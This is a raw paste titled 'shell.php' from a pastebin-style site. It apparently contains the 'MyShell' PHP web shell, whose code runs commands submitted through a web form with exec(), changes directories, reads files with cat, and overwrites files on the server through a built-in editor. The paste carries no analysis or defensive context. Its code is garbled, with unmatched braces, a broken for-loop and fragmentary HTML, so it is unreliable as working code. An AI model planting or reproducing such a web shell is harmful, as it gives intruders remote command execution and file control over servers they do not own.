PHP   25

shell.php

Guest on 26th May 2022 01:47:34 AM

  1. <?php
  2. Echo "MyShellVersion";
  3. if(isset($PHP_AUTH_USER))
  4. {
  5.  $warnMsg =" This is $MyShellVersion installed on: http://".$HTTP_SERVER_VARS["HTTP_HOST"]."$PHP_SELF just to let you know that somebody tryed to access the script using wrong username or password: Date: ".date("Y-m-d H:i:s")." IP: ".$HTTP_SERVER_VARS["REMOTE_ADDR"]." User Agent: ".$HTTP_SERVER_VARS["HTTP_USER_AGENT"]." username used: $PHP_AUTH_USER password used: $PHP_AUTH_PW If this is not the first time it happens, please consider either to remove MyShell from your system or change it's name or directory location on your server. Regards The MyShell dev team "; mail($adminEmail,"MyShell Warning - Unauthorized Access",$warnMsg, "From: $fromEmail\nX-Mailer:$MyShellVersion AutoWarn System");
  6.  
  7.  }
  8.  }
  9.  }
  10.  //Function that validate directories
  11. function validate_dir($dir)
  12. {
  13. GLOBAL $dirLimit;
  14. if($dirLimit)
  15. {
  16. $cdPos = strpos($dir,$dirLimit);
  17. if ((string)$cdPos == "")
  18. {
  19. $dir = $dirLimit; $GLOBALS["shellOutput"] = "You are not allowed change to directories above $dirLimit\n";
  20. }
  21. }
  22. return $dir;
  23. }
  24. // Set working directory.
  25.  if (isset($work_dir))
  26.  {
  27.  //A workdir has been asked for - we chdir to that dir.
  28.  $work_dir = validate_dir($work_dir);
  29. @chdir($work_dir) or ($shellOutput = "MyShell: can't change directory. Permission denied\nSwitching back to $DOCUMENT_ROOT\n");
  30.  $work_dir = exec("pwd");
  31.  }
  32. else
  33. {
  34.  // No work_dir - we chdir to $DOCUMENT_ROOT
  35.  $work_dir = validate_dir($DOCUMENT_ROOT); chdir($work_dir);
  36.  $work_dir = exec("pwd");
  37.  }
  38. //Now we handle files if we are in Edit Mode
  39. if($editMode && ($command||$editCancel))
  40. $editMode=false;
  41. if($editMode)
  42. {
  43. if($editSave ||$editSaveExit)
  44. {
  45. ini_set("track_errors","1");
  46. if($fp=@fopen($file,"w"))
  47. {
  48. $shellOut=stripslashes($shellOut);
  49.  fputs($fp,$shellOut);
  50. fclose($fp);
  51.  $command = $TexEd." ".$file; if($editSaveExit)
  52. {
  53. $command="";
  54. $shellOutput="MyShell: $file: saved"; $editMode=false;
  55.  }
  56.  }
  57.  else
  58.  {
  59. $command=""; $shellOutput="MyShell: Error while saving $file:\n$php_errormsg\nUse back button to recover your changes.";
  60.  $errorSave=true;
  61.  }
  62. }
  63.  }
  64. //Separate command(s) and arguments to analize first command
  65. $input=explode(" ",$command);
  66. while (list ($key, $val) = each ($voidCommands))
  67.  {
  68. if($input[0]==$val)
  69. {
  70. $voidCmd = $input[0];
  71. $input[0]="void";
  72. }
  73. }
  74.  switch($input[0])
  75. {
  76. case "cd": $path=$input[1];
  77. if ($path=="..")
  78. {
  79. $work_dir=strrev(substr(strstr(strrev($work_dir), "/"), 1));
  80.  if ($work_dir == "")
  81. $work_dir = "/";
  82. }
  83.  elseif (substr($path,0,1)=="/")
  84. $work_dir=$path;
  85. else $work_dir=$work_dir."/".$path;
  86.  $work_dir = validate_dir($work_dir);
  87. @chdir($work_dir) or ($shellOutput = "MyShell: can't change directory.\n$work_dir: does not exist or permission denied");
  88. $work_dir = exec("pwd");
  89. $commandBk = $command;
  90. $command = "";
  91. break; case "man": exec($command,$man);
  92. if($man)
  93. {
  94. $codes = ".".chr(8);
  95. $manual = implode("\n",$man);
  96.  $shellOutput = ereg_replace($codes,"",$manual);
  97. $commandBk = $command;
  98.  $command = "";
  99. } else
  100.  $stderr=1;
  101. break;
  102. case "cat": exec($command,$cat);
  103. if($cat)
  104. { $text = implode("\n",$cat);
  105.  $shellOutput = htmlspecialchars($text);
  106. $commandBk = $command;
  107. $command = "";
  108. } else $stderr=1;
  109. break;
  110. case "more": exec($command,$cat);
  111.  if($cat){ $text = implode("\n",$cat);
  112. $shellOutput = htmlspecialchars($text);
  113. $commandBk = $command;
  114.  $command = "";
  115. }
  116. else
  117.  $stderr=1;
  118. break;
  119. case $TexEd: if(file_exists($input[1])){ exec("cat ".$input[1],$cat);
  120. $text = implode("\n",$cat);
  121. $shellOutput = htmlspecialchars($text);
  122. $fileOwner = posix_getpwuid(fileowner($input[1]));
  123. $filePerms = sprintf("%o", (fileperms($input[1])) & 0777);
  124.  $fileEditInfo = "  :::::::  Owner: ".$fileOwner["name"]." Permissions: $filePerms";
  125. }
  126. else $fileEditInfo = "  :::::::  NEW FILE"; $currFile = $input[1];
  127. $editMode = true;
  128. $command = "";
  129.  break;
  130. case "void": $shellOutput = "MyShell: $voidCmd: void command for MyShell";
  131. $commandBk = $command; $command = "";
  132. }
  133. //Now we prepare the webpage
  134.  if(!$oCols)
  135. $oCols=$termCols;
  136. if(!$oRows)
  137. $oRows=$termRows;
  138.  if($editMode)$focus="shellOut.focus()";
  139.  else $focus="command.select()";
  140. //WhoamI
  141. if(!$whoami)
  142. $whoami=exec("whoami");
  143. ?>
  144. > Current User: >   :::::::   MyShell file editor <?php
  145. $work_dir/$currFile $fileEditInfo\n";
  146. }
  147. else
  148. {
  149. echo
  150. "Current working directory: \n"; $work_dir_splitted = explode("/", substr($work_dir, 1));
  151. echo "Root/"; if ($work_dir_splitted[0] == "")
  152. {
  153. $work_dir = "/";
  154. /* Root directory. */
  155. }
  156. else
  157. {
  158. for ($i = 0; $i < count($work_dir_splitted) ; $i++;)
  159. {
  160. $url .= "/".$work_dir_splitted[$i];
  161. echo "$work_dir_splitted[$i]/";
  162. }
  163. }
  164. }
  165. ?>

Raw Paste


Login or Register to edit or fork this paste. It's free.